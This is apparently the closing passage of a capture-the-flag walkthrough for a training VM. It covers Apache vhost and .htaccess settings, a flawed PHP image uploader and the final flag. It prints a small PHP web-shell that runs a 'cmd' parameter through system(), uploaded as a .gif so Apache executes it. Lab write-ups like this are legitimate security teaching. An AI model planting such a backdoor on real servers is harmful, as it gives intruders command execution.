	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
	DocumentRoot /var/thatsg0nnaleaveamark

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error2.log
	CustomLog ${APACHE_LOG_DIR}/access2.log combined
<Directory /var/thatsg0nnaleaveamark/>
    Require all granted
    AllowOverride All
    Options Indexes FollowSymLinks
</Directory>
	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Looking in /var/thatsg0nnaleaveamark I find another subfolder in Nick's site called P4TCH_4D4MS:

ls -al /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/
total 28
drwxr-xr-x 3 www-data www-data 4096 Jul 15 12:47 .
drwxr-xr-x 3 www-data www-data 4096 Jul 17 08:19 ..
-rw-r--r-- 1 root     root     1603 Jul 15 12:25 backupload.php
-rw-r--r-- 1 root     root      206 Jul 15 12:25 .htaccess
-rw-r--r-- 1 root     root      280 Jul 15 12:03 index.html
-rw-r--r-- 1 root     root     1615 Jul 15 12:47 upload.php
drwxrwxrwx 2 www-data www-data 4096 Jul 15 12:50 uploads

Maybe there is a flaw in this site that will let me read flag 5 as www-data. The page appears to be a tool for uploading images:

[screenshot: Tommy_uploader]

The page source shows that the form submits to upload.php:

cat index.html
<!DOCTYPE html>
<html>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>

There is both an upload.php and a backupload.php, so I diff the two to see what is different:

diff backupload.php upload.php
40c40
< echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded."; --- >         echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to /uploads.";

The only real difference is the message printed after a file is uploaded: one tells you the files land in /uploads, the other doesn't. So next I look at backupload.php to see how it works:

$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
// Check if image file is a actual image or fake image
//if(isset($_POST["submit"])) {
//    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
//    if($check !== false) {
//        echo "File is an image - " . $check["mime"] . ".";
//        $uploadOk = 1;
//    } else {
//        echo "File is not an image.";
//        $uploadOk = 0;
//    }
//}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry genius, that file already exists. ";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large - what a moron! .";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed, douchenozzle! ";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.  Want me to save your game of Minesweeper though? ";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
    } else {
        echo "Sorry, there was an error uploading your file.  Have you tried rebooting or single-clicking on it? ";
    }
}

On line 17 the script refuses the upload if a file with the same name already exists in uploads/. Line 22 rejects anything larger than 500000 bytes. Line 27 compares the extension that pathinfo() pulled out of the user-supplied filename on line 4 against a short allow-list of jpg, png, jpeg and gif, using exact, case-sensitive string comparisons. Notice what is missing: the getimagesize() block that would have verified the content is actually an image is commented out, so the only thing the script inspects is the name I give the file, and it stores the file under that same basename in uploads/. That should be easy enough to satisfy with a file that is not an image at all. Next I take a look at the .htaccess file to see if there are any settings unique to this folder.

cat .htaccess
BrowserMatchNoCase "iPhone" allowed
AddType application/x-httpd-php .gif
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "<H1>Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content</H1><H2>Lol</H2>"

Two things in this file matter. The BrowserMatchNoCase line sets an environment variable named allowed whenever the User-Agent contains "iPhone", and the Deny/Allow pair only lets requests carrying that variable through; everyone else gets the custom 403 page. More importantly, AddType application/x-httpd-php .gif tells Apache to hand any .gif in this directory (and its subdirectories, including uploads/) to the PHP interpreter. Combined with the extension allow-list in upload.php, that means a file of PHP code saved with a .gif extension will be accepted by the uploader and executed when requested. So I whip up some simple PHP code in a file that matches all of the rules in upload.php.

<?php
// Minimal command backdoor. Saved with a .gif extension so it passes the
// upload.php allow-list, and executed as PHP because of the AddType in .htaccess.
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST["cmd"]);   // $_REQUEST accepts GET, POST or cookie parameters
    system($cmd);                // run the command and stream its output to the response
    echo "</pre>$cmd<pre>";      // echo the command back after the output
    die;
}
?>

This PHP code looks for a parameter called cmd (read through $_REQUEST, so it can arrive in the query string or a POST body) and passes its value straight to system(), which executes it as a shell command and prints the output.

Next I use the upload form to put my .gif-named PHP file on the server, then request it from the uploads/ directory with a cmd parameter to execute commands. Since Apache runs the code, the commands execute as the web server's account, www-data.
[Screenshot: Tommy_phpbackdoor, command output from the uploaded .gif]
www-data has access to the final flag so I use this backdoor to read the flag5 file.
[Screenshot: Tommy_flag5, contents of the flag5 file]
With all five flags gathered I can put together the password and extract LOOT.ZIP.

unzip -P B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack LOOT.ZIP
Archive:  LOOT.ZIP
  inflating: THE-END.txt 
cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec



Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

I did contact the author, Brian Johnson, and he seems like a great guy. I recommend checking out his podcast "Seven Minute Security". This VM was just the right amount of challenge for me and was a good break from assembly debugging. It was maybe a little heavy on password attacks but had a great theme and some clever twists. I look forward to doing more of these in the future.
